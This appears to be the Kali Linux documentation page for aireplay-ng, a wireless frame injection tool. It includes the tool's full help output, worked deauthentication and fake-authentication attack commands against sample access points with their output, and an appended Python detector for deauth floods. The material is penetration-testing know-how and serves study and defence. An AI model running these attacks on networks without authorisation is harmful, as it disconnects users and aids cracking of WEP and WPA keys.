Aireplay-ng Description

Aireplay-ng is included in the aircrack-ng package and is used to inject wireless frames. Its primary function is to generate traffic for later use with aircrack-ng to crack WEP and WPA-PSK keys. Aireplay-ng supports several attacks: deauthentication (used to capture WPA handshake data), fake authentication, interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection.

Author: Thomas d'Otreppe, Original work: Christophe Devine
License: GPL v2

Kali aircrack-ng Repo

aireplay-ng – inject packets into a wireless network to generate traffic

root@kali:~# aireplay-ng --help

  Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe

  usage: aireplay-ng <options> <replay interface>

  Filter options:
      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len   : minimum packet length
      -n len   : maximum packet length
      -u type   : frame control, type field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To DS bit
      -f fromds : frame control, From DS bit
      -w iswep  : frame control, WEP bit
      -D    : disable AP detection

  Replay options:
      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination MAC address
      -h smac   : set Source MAC address
      -g value  : change ring buffer size (default: 8)
      -F     : choose first matching packet

  Fakeauth attack options:
      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec   : seconds between keep-alives
      -Q      : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n     : exit after retry fake auth request n time

  Arp Replay attack options:
      -j     : inject FromDS packets

  Fragmentation attack options:
      -k IP  : set destination IP in fragments
      -l IP  : set source IP in fragments

  Test attack options:
      -B     : activates the bitrate test

  Source options:
      -i iface : capture packets from this interface
      -r file  : extract packets from this pcap file

  Miscellaneous options:
      -R   : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be
      determined, ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):
      --deauth count : deauthenticate 1 or all stations (-0)
      --fakeauth delay : fake authentication with AP (-1)
      --interactive : interactive frame selection (-2)
      --arpreplay : standard ARP-request replay (-3)
      --chopchop : decrypt/chopchop WEP packet (-4)
      --fragment : generates valid keystream   (-5)
      --caffe-latte : query a client for new IVs  (-6)
      --cfrag : fragments against a client  (-7)
      --migmode : attacks WPA migration mode  (-8)
      --test : tests injection and quality (-9)

      --help : Displays this usage screen

aireplay-ng Usage Examples

Deauthentication Attack

Run the deauthentication attack (-0), sending 5 packets to the wireless access point (-a 8C:7F:3B:7E:81:B6) to deauthenticate the wireless client (-c 00:08:22:B9:41:A1) via the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56 Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]


Fake Authentication Attack

Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a F0:F2:49:82:DF:3B) with the given ESSID (-e FBI-Van-24), specifying our own MAC address (-h 3c:46:d8:4e:ef:aa), using the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59  Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6
12:50:06  Sending Authentication Request (Open System)
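Defensive counterpart to the two examples above, added here and not part of the aireplay-ng project or this page: a stdlib-only Python detector that parses the 802.11 frame control and address fields (the same type/subtype fields that aireplay-ng's -u/-v filters match on) and flags bursts of deauthentication, disassociation and authentication management frames per BSSID/station pair, which is what a deauth flood or a repeated fake-auth attempt looks like on the air. The sample frames are constructed inline using the MAC addresses from the deauth example; the threshold and the `peer` heuristic are assumptions of this example.

```python
from collections import Counter

MGMT_TYPE = 0
SUBTYPE_NAMES = {0x0B: "auth", 0x0A: "disassoc", 0x0C: "deauth"}

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame: bytes):
    """Return (subtype, da, sa, bssid) for a management frame, else None.
    Frame control byte 0: bits 2-3 = type, bits 4-7 = subtype."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if ((fc0 >> 2) & 0x03) != MGMT_TYPE:
        return None
    subtype = (fc0 >> 4) & 0x0F
    return subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])

def build_mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Build a raw 802.11 management frame; used here only to construct sample input."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return fc + b"\x3a\x01" + da + sa + bssid + b"\x00\x00" + body

def find_mgmt_floods(frames, threshold: int = 10):
    """Count auth/disassoc/deauth frames per (kind, bssid, peer) and flag bursts."""
    counts = Counter()
    for f in frames:
        parsed = parse_mgmt(f)
        if parsed is None or parsed[0] not in SUBTYPE_NAMES:
            continue
        subtype, da, sa, bssid = parsed
        peer = sa if da == bssid else da   # the station on the other end of the frame
        counts[(SUBTYPE_NAMES[subtype], bssid, peer)] += 1
    return {k: v for k, v in counts.items() if v >= threshold}

# Constructed sample: the MACs from the page's deauth example (8C:7F:3B:7E:81:B6 AP,
# 00:08:22:B9:41:A1 client), 64 spoofed deauths plus a few benign beacons (subtype 8).
AP = bytes.fromhex("8c7f3b7e81b6")
STA = bytes.fromhex("000822b941a1")
SAMPLE = [build_mgmt(0x0C, STA, AP, AP, b"\x07\x00") for _ in range(64)]
SAMPLE += [build_mgmt(0x08, b"\xff" * 6, AP, AP) for _ in range(5)]

def demo():
    return find_mgmt_floods(SAMPLE)

if __name__ == "__main__":
    for (kind, bssid, peer), n in demo().items():
        print(f"{kind} burst: {n} frames, bssid={bssid} peer={peer}")
```

Feed it frames read from a monitor-mode capture (radiotap header stripped) to check a real trace; the output of the deauth example above would appear as one "deauth" entry with 64 frames.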